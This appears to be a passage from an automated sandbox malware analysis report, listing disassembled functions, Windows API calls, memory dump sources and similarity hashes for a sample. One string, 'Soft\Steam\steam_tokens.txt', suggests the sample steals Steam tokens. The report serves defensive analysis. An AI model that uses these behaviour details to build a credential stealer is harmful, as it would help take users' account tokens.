                                                                                                                                                                                          Function 00036FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00036FFE
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Soft\Steam\steam_tokens.txt, xrefs: 0003700E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                          • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                          • API String ID: 502913869-3507145866
                                                                                                                                                                                          • Opcode ID: 9364e3521c6f97f41c0b7d7aa010c37d0f44f1c8a4dd3a303d4aa226d66adbe3
                                                                                                                                                                                          • Instruction ID: e0814eece82922c1692d8d90e7313ab3fc5a43deab1b14c5ee3b1d1e71763d51
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9364e3521c6f97f41c0b7d7aa010c37d0f44f1c8a4dd3a303d4aa226d66adbe3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1601E876D40119BBCF01BBE4ED478CEBB78AF54354F504261FA00B7117DB31AA9A8AE1
                                                                                                                                                                                          Function 000277F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00027C18,?,?), ref: 0002784A
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00027874
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                          • Opcode ID: 8b8d032f5cc86e6683b42bc77150acba4d18586d2d9e0cabd9503cac96aa61f5
                                                                                                                                                                                          • Instruction ID: 94a84d089856e1c4ad7b2207370b18ac304c3ba9625255b6673fe1fd80144eb8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b8d032f5cc86e6683b42bc77150acba4d18586d2d9e0cabd9503cac96aa61f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C11D071A84B15AFC724CFB8D989BAAB7F4EB44714F24086CE60ED7290E670A940C710
                                                                                                                                                                                          Function 0003CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • malloc.MSVCRT ref: 0003CBC9
                                                                                                                                                                                            • Part of subcall function 0003BB6C: lstrlenA.KERNEL32(?,0003CBDA,0003CC7C,00000000,06400000,00000003,00000000,0003757F,.exe,00056C5C,00056C58,00056C54,00056C50,00056C4C,00056C48,00056C44), ref: 0003BB9E
                                                                                                                                                                                            • Part of subcall function 0003BB6C: malloc.MSVCRT ref: 0003BBA6
                                                                                                                                                                                            • Part of subcall function 0003BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0003BBB1
                                                                                                                                                                                          • malloc.MSVCRT ref: 0003CC06
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2974738957-0
                                                                                                                                                                                          • Opcode ID: 55a4f4fc0973817a0c9194d3e4ca2e81283f1a971766242ed86b45c7bce13f47
                                                                                                                                                                                          • Instruction ID: 007a386e506bb2c6bea6135827981b90d544077bdd79c2e29c0ed473048da4e8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 55a4f4fc0973817a0c9194d3e4ca2e81283f1a971766242ed86b45c7bce13f47
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EF0B4726052259BEB226F66EC45D9ABBDCFB447A0F094021FE0CEB252DB30DC0087B1
                                                                                                                                                                                          Function 000384AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 362aeb04b0a845ecca87f0895b0457b14d21dd380bceeaa89ff344dae6183d6f
                                                                                                                                                                                          • Instruction ID: 70a45cebb6d08b87b814ad7cf30aa8eb543dea0c3492624aa8a37a47ecb6bf7a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 362aeb04b0a845ecca87f0895b0457b14d21dd380bceeaa89ff344dae6183d6f
                                                                                                                                                                                          • Instruction Fuzzy Hash: DE514C72901B10ABCEF37BAE954AAF4B6DD6FB0324F1584C2F4148A1339F658D984F61
                                                                                                                                                                                          Function 00027BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d34658a4328f17e581cedb50a77329f0dcc36096df16a7b9b9a5255842121a89
                                                                                                                                                                                          • Instruction ID: 59ed9b08c41faf7a1b0b1d88ea14b8ea25a9ebede9d61931d607a4dc8685ab70
                                                                                                                                                                                          • Opcode Fuzzy Hash: d34658a4328f17e581cedb50a77329f0dcc36096df16a7b9b9a5255842121a89
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D3171719086259FCF26DF65E9818ADFBF6EF84310B31416EE419A7352D7308E81CB90
                                                                                                                                                                                          Function 00031DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FolderPathlstrcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1699248803-0
                                                                                                                                                                                          • Opcode ID: de62f5c94e11db23aebb367d33498101e6fd343d18d8cc1609881c6221718a1a
                                                                                                                                                                                          • Instruction ID: 0db93eefa06c061a66afe5f9576add4f6e1a28e829ba842a2b8309cf4da55a95
                                                                                                                                                                                          • Opcode Fuzzy Hash: de62f5c94e11db23aebb367d33498101e6fd343d18d8cc1609881c6221718a1a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42F03AB1E0015DABDB16DF78EC51AEEB7FCEB48200F0005B6B909D3281DA30AF458B90
                                                                                                                                                                                          Function 00031D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,?,?,0002DA7F,?,?,?), ref: 00031D99
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: 2407888730d9cd447d6ff620409393cc4f4b65165e0d86f7c43ff93eb94180f1
                                                                                                                                                                                          • Instruction ID: def3a2f5f5b9a5a4194e6d9f3d273485b9f001e9986868eb5120fae19e552cd2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2407888730d9cd447d6ff620409393cc4f4b65165e0d86f7c43ff93eb94180f1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 91D05E31900038A74AA256A8EC044DEBB4CCF0B7B4F014220FD699A0A1C2209C9242D0
                                                                                                                                                                                          Function 00032541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SHFileOperationA.SHELL32(?), ref: 00032577
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileOperation
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3080627654-0
                                                                                                                                                                                          • Opcode ID: adb2a551593dd05bd47c04d7800a8cba1f4a44484b880eb5f363a42b3256a31d
                                                                                                                                                                                          • Instruction ID: cdb66fef6d84aae2fd1cc515fc2dd609da7260310081bf4d66800afc663f02b2
                                                                                                                                                                                          • Opcode Fuzzy Hash: adb2a551593dd05bd47c04d7800a8cba1f4a44484b880eb5f363a42b3256a31d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 39E09AB0D0420E9FDB44EFA4D5092DEBAF8FF08309F405069C515F3240E37952098FA5
                                                                                                                                                                                          Function 0003C32D Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                          • Opcode ID: 5f687c053371a407e062fbb1e75f6dbc80a2c71aebabc71b9aef0dd40db3eaf7
                                                                                                                                                                                          • Instruction ID: f702cc348e2f2e6addb9f4982a5c5324e996f5cec67730b4ee13102dd3959a50
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f687c053371a407e062fbb1e75f6dbc80a2c71aebabc71b9aef0dd40db3eaf7
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE21D474200B108FD321DF6ED485996B7F8FF4A324B18486DE68ADB722D772E881CB51
